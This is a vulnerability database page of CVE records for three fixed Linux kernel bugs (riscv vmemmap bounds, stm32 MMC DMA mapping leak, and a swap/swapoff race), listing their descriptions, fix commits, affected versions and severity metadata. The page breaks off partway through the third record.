Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
riscv: Sparse-Memory/vmemmap out-of-bounds fix
Offset vmemmap so that the first page of vmemmap will be mapped
to the first page of physical memory in order to ensure that
vmemmap’s bounds will be respected during
pfn_to_page()/page_to_pfn() operations.
The conversion macros will produce correct SV39/48/57 addresses
for every possible/valid DRAM_BASE inside the physical memory limits.
v2:Address Alex's comments
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d95f1a542c3df396137afa217ef9bd39cb8931ca Version: d95f1a542c3df396137afa217ef9bd39cb8931ca Version: d95f1a542c3df396137afa217ef9bd39cb8931ca Version: d95f1a542c3df396137afa217ef9bd39cb8931ca Version: d95f1a542c3df396137afa217ef9bd39cb8931ca Version: d95f1a542c3df396137afa217ef9bd39cb8931ca |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26795",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T19:27:22.580328Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T19:27:29.143Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.470Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8af1c121b0102041809bc137ec600d1865eaeedd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5941a90c55d3bfba732b32208d58d997600b44ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8310080799b40fd9f2a8b808c657269678c149af"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a278d5c60f21aa15d540abb2f2da6e6d795c3e6e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2a1728c15ec4f45ed9248ae22f626541c179bfbe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a11dd49dcb9376776193e15641f84fcc1e5980c9"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/riscv/include/asm/pgtable.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8af1c121b0102041809bc137ec600d1865eaeedd",
"status": "affected",
"version": "d95f1a542c3df396137afa217ef9bd39cb8931ca",
"versionType": "git"
},
{
"lessThan": "5941a90c55d3bfba732b32208d58d997600b44ef",
"status": "affected",
"version": "d95f1a542c3df396137afa217ef9bd39cb8931ca",
"versionType": "git"
},
{
"lessThan": "8310080799b40fd9f2a8b808c657269678c149af",
"status": "affected",
"version": "d95f1a542c3df396137afa217ef9bd39cb8931ca",
"versionType": "git"
},
{
"lessThan": "a278d5c60f21aa15d540abb2f2da6e6d795c3e6e",
"status": "affected",
"version": "d95f1a542c3df396137afa217ef9bd39cb8931ca",
"versionType": "git"
},
{
"lessThan": "2a1728c15ec4f45ed9248ae22f626541c179bfbe",
"status": "affected",
"version": "d95f1a542c3df396137afa217ef9bd39cb8931ca",
"versionType": "git"
},
{
"lessThan": "a11dd49dcb9376776193e15641f84fcc1e5980c9",
"status": "affected",
"version": "d95f1a542c3df396137afa217ef9bd39cb8931ca",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/riscv/include/asm/pgtable.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nriscv: Sparse-Memory/vmemmap out-of-bounds fix\n\nOffset vmemmap so that the first page of vmemmap will be mapped\nto the first page of physical memory in order to ensure that\nvmemmap\u2019s bounds will be respected during\npfn_to_page()/page_to_pfn() operations.\nThe conversion macros will produce correct SV39/48/57 addresses\nfor every possible/valid DRAM_BASE inside the physical memory limits.\n\nv2:Address Alex\u0027s comments"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:43.098Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8af1c121b0102041809bc137ec600d1865eaeedd"
},
{
"url": "https://git.kernel.org/stable/c/5941a90c55d3bfba732b32208d58d997600b44ef"
},
{
"url": "https://git.kernel.org/stable/c/8310080799b40fd9f2a8b808c657269678c149af"
},
{
"url": "https://git.kernel.org/stable/c/a278d5c60f21aa15d540abb2f2da6e6d795c3e6e"
},
{
"url": "https://git.kernel.org/stable/c/2a1728c15ec4f45ed9248ae22f626541c179bfbe"
},
{
"url": "https://git.kernel.org/stable/c/a11dd49dcb9376776193e15641f84fcc1e5980c9"
}
],
"title": "riscv: Sparse-Memory/vmemmap out-of-bounds fix",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26795",
"datePublished": "2024-04-04T08:20:25.063Z",
"dateReserved": "2024-02-19T14:20:24.178Z",
"dateUpdated": "2025-05-04T08:56:43.098Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26787 (GCVE-0-2024-26787)
Vulnerability from cvelistv5
Published
2024-04-04 08:20
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mmc: mmci: stm32: fix DMA API overlapping mappings warning
Turning on CONFIG_DMA_API_DEBUG_SG results in the following warning:
DMA-API: mmci-pl18x 48220000.mmc: cacheline tracking EEXIST,
overlapping mappings aren't supported
WARNING: CPU: 1 PID: 51 at kernel/dma/debug.c:568
add_dma_entry+0x234/0x2f4
Modules linked in:
CPU: 1 PID: 51 Comm: kworker/1:2 Not tainted 6.1.28 #1
Hardware name: STMicroelectronics STM32MP257F-EV1 Evaluation Board (DT)
Workqueue: events_freezable mmc_rescan
Call trace:
add_dma_entry+0x234/0x2f4
debug_dma_map_sg+0x198/0x350
__dma_map_sg_attrs+0xa0/0x110
dma_map_sg_attrs+0x10/0x2c
sdmmc_idma_prep_data+0x80/0xc0
mmci_prep_data+0x38/0x84
mmci_start_data+0x108/0x2dc
mmci_request+0xe4/0x190
__mmc_start_request+0x68/0x140
mmc_start_request+0x94/0xc0
mmc_wait_for_req+0x70/0x100
mmc_send_tuning+0x108/0x1ac
sdmmc_execute_tuning+0x14c/0x210
mmc_execute_tuning+0x48/0xec
mmc_sd_init_uhs_card.part.0+0x208/0x464
mmc_sd_init_card+0x318/0x89c
mmc_attach_sd+0xe4/0x180
mmc_rescan+0x244/0x320
DMA API debug brings to light leaking dma-mappings as dma_map_sg and
dma_unmap_sg are not correctly balanced.
If an error occurs in mmci_cmd_irq function, only mmci_dma_error
function is called and as this API is not managed on stm32 variant,
dma_unmap_sg is never called in this error path.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 46b723dd867d599420fb640c0eaf2a866ef721d4 Version: 46b723dd867d599420fb640c0eaf2a866ef721d4 Version: 46b723dd867d599420fb640c0eaf2a866ef721d4 Version: 46b723dd867d599420fb640c0eaf2a866ef721d4 Version: 46b723dd867d599420fb640c0eaf2a866ef721d4 Version: 46b723dd867d599420fb640c0eaf2a866ef721d4 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.461Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0224cbc53ba82b84affa7619b6d1b1a254bc2c53"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5ae5060e17a3fc38e54c3e5bd8abd6b1d5bfae7c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70af82bb9c897faa25a44e4181f36c60312b71ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/176e66269f0de327375fc0ea51c12c2f5a97e4c4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d610a307225951929b9dff807788439454476f85"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6b1ba3f9040be5efc4396d86c9752cdc564730be"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26787",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:51:02.092511Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:51.566Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/mmc/host/mmci_stm32_sdmmc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0224cbc53ba82b84affa7619b6d1b1a254bc2c53",
"status": "affected",
"version": "46b723dd867d599420fb640c0eaf2a866ef721d4",
"versionType": "git"
},
{
"lessThan": "5ae5060e17a3fc38e54c3e5bd8abd6b1d5bfae7c",
"status": "affected",
"version": "46b723dd867d599420fb640c0eaf2a866ef721d4",
"versionType": "git"
},
{
"lessThan": "70af82bb9c897faa25a44e4181f36c60312b71ef",
"status": "affected",
"version": "46b723dd867d599420fb640c0eaf2a866ef721d4",
"versionType": "git"
},
{
"lessThan": "176e66269f0de327375fc0ea51c12c2f5a97e4c4",
"status": "affected",
"version": "46b723dd867d599420fb640c0eaf2a866ef721d4",
"versionType": "git"
},
{
"lessThan": "d610a307225951929b9dff807788439454476f85",
"status": "affected",
"version": "46b723dd867d599420fb640c0eaf2a866ef721d4",
"versionType": "git"
},
{
"lessThan": "6b1ba3f9040be5efc4396d86c9752cdc564730be",
"status": "affected",
"version": "46b723dd867d599420fb640c0eaf2a866ef721d4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/mmc/host/mmci_stm32_sdmmc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.213",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.152",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.213",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.152",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmmc: mmci: stm32: fix DMA API overlapping mappings warning\n\nTurning on CONFIG_DMA_API_DEBUG_SG results in the following warning:\n\nDMA-API: mmci-pl18x 48220000.mmc: cacheline tracking EEXIST,\noverlapping mappings aren\u0027t supported\nWARNING: CPU: 1 PID: 51 at kernel/dma/debug.c:568\nadd_dma_entry+0x234/0x2f4\nModules linked in:\nCPU: 1 PID: 51 Comm: kworker/1:2 Not tainted 6.1.28 #1\nHardware name: STMicroelectronics STM32MP257F-EV1 Evaluation Board (DT)\nWorkqueue: events_freezable mmc_rescan\nCall trace:\nadd_dma_entry+0x234/0x2f4\ndebug_dma_map_sg+0x198/0x350\n__dma_map_sg_attrs+0xa0/0x110\ndma_map_sg_attrs+0x10/0x2c\nsdmmc_idma_prep_data+0x80/0xc0\nmmci_prep_data+0x38/0x84\nmmci_start_data+0x108/0x2dc\nmmci_request+0xe4/0x190\n__mmc_start_request+0x68/0x140\nmmc_start_request+0x94/0xc0\nmmc_wait_for_req+0x70/0x100\nmmc_send_tuning+0x108/0x1ac\nsdmmc_execute_tuning+0x14c/0x210\nmmc_execute_tuning+0x48/0xec\nmmc_sd_init_uhs_card.part.0+0x208/0x464\nmmc_sd_init_card+0x318/0x89c\nmmc_attach_sd+0xe4/0x180\nmmc_rescan+0x244/0x320\n\nDMA API debug brings to light leaking dma-mappings as dma_map_sg and\ndma_unmap_sg are not correctly balanced.\n\nIf an error occurs in mmci_cmd_irq function, only mmci_dma_error\nfunction is called and as this API is not managed on stm32 variant,\ndma_unmap_sg is never called in this error path."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:31.080Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0224cbc53ba82b84affa7619b6d1b1a254bc2c53"
},
{
"url": "https://git.kernel.org/stable/c/5ae5060e17a3fc38e54c3e5bd8abd6b1d5bfae7c"
},
{
"url": "https://git.kernel.org/stable/c/70af82bb9c897faa25a44e4181f36c60312b71ef"
},
{
"url": "https://git.kernel.org/stable/c/176e66269f0de327375fc0ea51c12c2f5a97e4c4"
},
{
"url": "https://git.kernel.org/stable/c/d610a307225951929b9dff807788439454476f85"
},
{
"url": "https://git.kernel.org/stable/c/6b1ba3f9040be5efc4396d86c9752cdc564730be"
}
],
"title": "mmc: mmci: stm32: fix DMA API overlapping mappings warning",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26787",
"datePublished": "2024-04-04T08:20:19.751Z",
"dateReserved": "2024-02-19T14:20:24.178Z",
"dateUpdated": "2025-05-04T08:56:31.080Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26960 (GCVE-0-2024-26960)
Vulnerability from cvelistv5
Published
2024-05-01 05:19
Modified
2025-05-04 09:00
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mm: swap: fix race between free_swap_and_cache() and swapoff()
There was previously a theoretical window where swapoff() could run and
teardown a swap_info_struct while a call to free_swap_and_cache() was
running in another thread. This could cause, amongst other bad
possibilities, swap_page_trans_huge_swapped() (called by
free_swap_and_cache()) to access the freed memory for swap_map.
This is a theoretical problem and I haven't been able to provoke it from a
test case. But there has been agreement based on code review that this is
possible (see link below).
Fix it by using get_swap_device()/put_swap_device(), which will stall
swapoff(). There was an extra check in _swap_info_get() to confirm that
the swap entry was not free. This isn't present in get_swap_device()
because it doesn't make sense in general due to the race between getting
the reference and swapoff. So I've added an equivalent check directly in
free_swap_and_cache().
Details of how to provoke one possible issue (thanks to David Hildenbrand
for deriving this):
--8<-----
__swap_entry_free() might be the last user and result in
"count == SWAP_HAS_CACHE".
swapoff->try_to_unuse() will stop as soon as soon as si->inuse_pages==0.
So the question is: could someone reclaim the folio and turn
si->inuse_pages==0, before we completed swap_page_trans_huge_swapped().
Imagine the following: 2 MiB folio in the swapcache. Only 2 subpages are
still references by swap entries.
Process 1 still references subpage 0 via swap entry.
Process 2 still references subpage 1 via swap entry.
Process 1 quits. Calls free_swap_and_cache().
-> count == SWAP_HAS_CACHE
[then, preempted in the hypervisor etc.]
Process 2 quits. Calls free_swap_and_cache().
-> count == SWAP_HAS_CACHE
Process 2 goes ahead, passes swap_page_trans_huge_swapped(), and calls
__try_to_reclaim_swap().
__try_to_reclaim_swap()->folio_free_swap()->delete_from_swap_cache()->
put_swap_folio()->free_swap_slot()->swapcache_free_entries()->
swap_entry_free()->swap_range_free()->
...
WRITE_ONCE(si->inuse_pages, si->inuse_pages - nr_entries);
What stops swapoff to succeed after process 2 reclaimed the swap cache
but before process1 finished its call to swap_page_trans_huge_swapped()?
--8<-----
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e Version: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e Version: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e Version: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e Version: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e Version: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e Version: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "d85c11c97ecf",
"status": "affected",
"version": "7c00bafee87c",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "2da5568ee222",
"status": "affected",
"version": "7c00bafee87c",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "1ede7f1d7eed",
"status": "affected",
"version": "7c00bafee87c",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "0f98f6d2fb5f",
"status": "affected",
"version": "7c00bafee87c",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "3ce4c4c653e4",
"status": "affected",
"version": "7c00bafee87c",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "363d17e7f790",
"status": "affected",
"version": "7c00bafee87c",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "82b1c07a0af6",
"status": "affected",
"version": "7c00bafee87c",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.11",
"status": "unaffected",
"version": "5.10.215",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.2",
"status": "unaffected",
"version": "6.1.84",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.7",
"status": "unaffected",
"version": "6.6.24",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.9",
"status": "unaffected",
"version": "6.8.3",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.9"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:4.11:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "4.11"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.16",
"status": "unaffected",
"version": "5.15.154",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.8",
"status": "unaffected",
"version": "6.7.12",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26960",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-05T21:09:23.358079Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-362",
"description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-05T21:09:44.704Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:06.048Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d85c11c97ecf92d47a4b29e3faca714dc1f18d0d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2da5568ee222ce0541bfe446a07998f92ed1643e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1ede7f1d7eed1738d1b9333fd1e152ccb450b86a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0f98f6d2fb5fad00f8299b84b85b6bc1b6d7d19a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3ce4c4c653e4e478ecb15d3c88e690f12cbf6b39"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/363d17e7f7907c8e27a9e86968af0eaa2301787b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/82b1c07a0af603e3c47b906c8e991dc96f01688e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"mm/swapfile.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d85c11c97ecf92d47a4b29e3faca714dc1f18d0d",
"status": "affected",
"version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
"versionType": "git"
},
{
"lessThan": "2da5568ee222ce0541bfe446a07998f92ed1643e",
"status": "affected",
"version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
"versionType": "git"
},
{
"lessThan": "1ede7f1d7eed1738d1b9333fd1e152ccb450b86a",
"status": "affected",
"version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
"versionType": "git"
},
{
"lessThan": "0f98f6d2fb5fad00f8299b84b85b6bc1b6d7d19a",
"status": "affected",
"version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
"versionType": "git"
},
{
"lessThan": "3ce4c4c653e4e478ecb15d3c88e690f12cbf6b39",
"status": "affected",
"version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
"versionType": "git"
},
{
"lessThan": "363d17e7f7907c8e27a9e86968af0eaa2301787b",
"status": "affected",
"version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
"versionType": "git"
},
{
"lessThan": "82b1c07a0af603e3c47b906c8e991dc96f01688e",
"status": "affected",
"version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
